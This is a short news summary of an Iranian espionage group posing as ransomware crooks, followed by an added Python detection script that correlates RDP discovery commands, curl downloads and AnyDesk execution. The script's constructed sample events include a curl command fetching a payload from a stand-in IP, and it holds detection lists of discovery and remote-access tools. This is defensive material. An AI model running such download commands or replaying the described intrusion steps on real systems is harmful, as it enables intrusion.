Iran cybersnoops still LARPing as ransomware crooks in espionage ops
Briefly

"While connected, the [threat actor (TA)] executed basic discovery commands, accessed files related to the victim's VPN configuration, and instructed users to enter their credentials into locally-created text files."
"In at least one instance, the TA also deployed a remote management tool (AnyDesk) to further facilitate access."
"Armed with valid credentials, the attackers then executed various commands via RDP, which downloaded payloads using curl."
"These payloads included a backdoor malware dubbed Darkcomp, a malicious Microsoft WebView2 loader to disguise traffic, and an encrypted configuration file that sent instructions to Darkcomp."
Researchers identified MuddyWater, a cyber unit tied to Iranian intelligence, masquerading as the Chaos ransomware gang while conducting espionage. The operation began with a Microsoft Teams phishing campaign that convinced targets to share their screens and type their credentials into locally created text files. The attackers read the victims' VPN configuration files and, in at least one case, deployed the AnyDesk remote management tool to keep access. Using phishing pages to harvest further credentials, they then ran commands over RDP that fetched payloads with curl, including the Darkcomp backdoor, a malicious Microsoft WebView2 loader used to disguise its traffic, and an encrypted configuration file feeding instructions to Darkcomp, all in support of lateral movement and data exfiltration.
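The chain summarised above (interactive RDP logon, basic discovery commands, curl pulling payloads, a remote management tool appearing on the host) is a good candidate for correlation rather than single-event alerting. The following is an added example, not code from the researchers' report or from The Register, showing one way to do that over process-creation telemetry. The event field names (`ts`, `host`, `user`, `logon_type`, `image`, `cmdline`), the sample events and the IP address are constructed for illustration; `logon_type` 10 is the Windows RemoteInteractive (RDP) logon type, and the example assumes the events have been enriched with it.

```python
"""Correlate RDP-session discovery, curl downloads and RMM execution per host/user.

Added example for the MuddyWater write-up; it is not the researchers' detection
logic. Event schema and sample data are constructed, not taken from the report.
"""
import ntpath
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (assumed schema). 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [
    {"ts": "2025-01-10T09:00:01Z", "host": "WS01", "user": r"CORP\jdoe", "logon_type": 10,
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"ts": "2025-01-10T09:00:20Z", "host": "WS01", "user": r"CORP\jdoe", "logon_type": 10,
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c net user /domain"},
    {"ts": "2025-01-10T09:05:00Z", "host": "WS01", "user": r"CORP\jdoe", "logon_type": 10,
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\Users\Public\update.bin http://203.0.113.10/update.bin"},
    {"ts": "2025-01-10T09:06:30Z", "host": "WS01", "user": r"CORP\jdoe", "logon_type": 10,
     "image": r"C:\Users\Public\AnyDesk.exe", "cmdline": "AnyDesk.exe"},
    # Benign: a build account using curl from a local console logon (type 2), not RDP.
    {"ts": "2025-01-10T11:00:00Z", "host": "BUILD01", "user": r"CORP\ci", "logon_type": 2,
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -o artifact.zip https://artifacts.corp.example/build.zip"},
    # A single discovery command over RDP: suspicious but below the correlation threshold.
    {"ts": "2025-01-10T13:00:00Z", "host": "WS02", "user": r"CORP\asmith", "logon_type": 10,
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c ipconfig /all"},
]

DISCOVERY_CMDS = ("whoami", "net user", "net group", "ipconfig", "systeminfo",
                  "nltest", "hostname", "tasklist")
RMM_BINARIES = {"anydesk.exe"}          # extend with other RMM tools as policy dictates
RDP_LOGON_TYPE = 10                      # RemoteInteractive
WINDOW = timedelta(minutes=30)


def parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def classify(ev):
    """Return the name of the rule an event matches inside an RDP session, else None."""
    if ev.get("logon_type") != RDP_LOGON_TYPE:
        return None
    image = ntpath.basename(ev["image"]).lower()
    cmd = ev["cmdline"].lower()
    if image in RMM_BINARIES:
        return "rmm_tool_in_rdp_session"
    # curl writing a remote resource to disk (-o/--output with an http(s) URL).
    if image == "curl.exe" and re.search(r"https?://", cmd) \
            and re.search(r"(^|\s)(-o|--output)(\s|$)", cmd):
        return "curl_download_in_rdp_session"
    # Strip a "cmd.exe /c" wrapper so the discovery command itself is examined.
    body = cmd.split("/c", 1)[-1].strip() if cmd.startswith("cmd.exe") else cmd
    if body.startswith(DISCOVERY_CMDS):
        return "discovery_in_rdp_session"
    return None


def correlate(events, min_rules=2, window=WINDOW):
    """Alert on a (host, user) when >= min_rules distinct rules fire within one window."""
    hits = defaultdict(list)
    for ev in sorted(events, key=lambda e: parse_ts(e["ts"])):
        rule = classify(ev)
        if rule:
            hits[(ev["host"], ev["user"])].append((parse_ts(ev["ts"]), rule, ev["cmdline"]))
    alerts = []
    for (host, user), seq in hits.items():
        for i, (t0, _, _) in enumerate(seq):
            in_window = [h for h in seq[i:] if h[0] - t0 <= window]
            rules = sorted({h[1] for h in in_window})
            if len(rules) >= min_rules:
                alerts.append({"host": host, "user": user, "first_seen": t0.isoformat(),
                               "rules": rules, "evidence": [h[2] for h in in_window]})
                break  # one alert per (host, user); later windows would repeat it
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Requiring two or more distinct behaviours inside one RDP session keeps a lone `ipconfig` or a legitimate `curl` from paging anyone, while the sequence the report describes (discovery, then a download, then an RMM install) trips the threshold on the first event of the window. Tune `DISCOVERY_CMDS`, `RMM_BINARIES` and `WINDOW` to the environment; the sample data here is constructed and not evidence of any real intrusion.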
Read at theregister